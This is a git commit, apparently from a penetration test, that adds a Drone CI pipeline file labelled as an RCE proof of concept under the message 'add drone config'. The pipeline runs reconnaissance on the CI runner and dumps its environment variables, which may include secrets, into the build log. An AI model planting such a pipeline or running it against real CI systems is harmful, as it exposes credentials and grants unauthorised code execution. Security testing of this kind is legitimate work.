add drone config
All checks were successful
continuous-integration/drone Build is passing

This commit is contained in:
2026-03-17 01:44:23 +01:00
parent abb3629b48
commit 2c4ed2e81a

15
.drone.yml Normal file
View File

@@ -0,0 +1,15 @@
kind: pipeline
type: docker
name: pentest-poc
steps:
- name: poc
image: alpine:latest
commands:
- echo "=== DRONE CI RCE PoC ==="
- echo "hostname:" && hostname
- echo "id:" && id
- echo "uname:" && uname -a
- echo "env:" && env | sort
- echo "network:" && cat /etc/hosts
- echo "=== END PoC ==="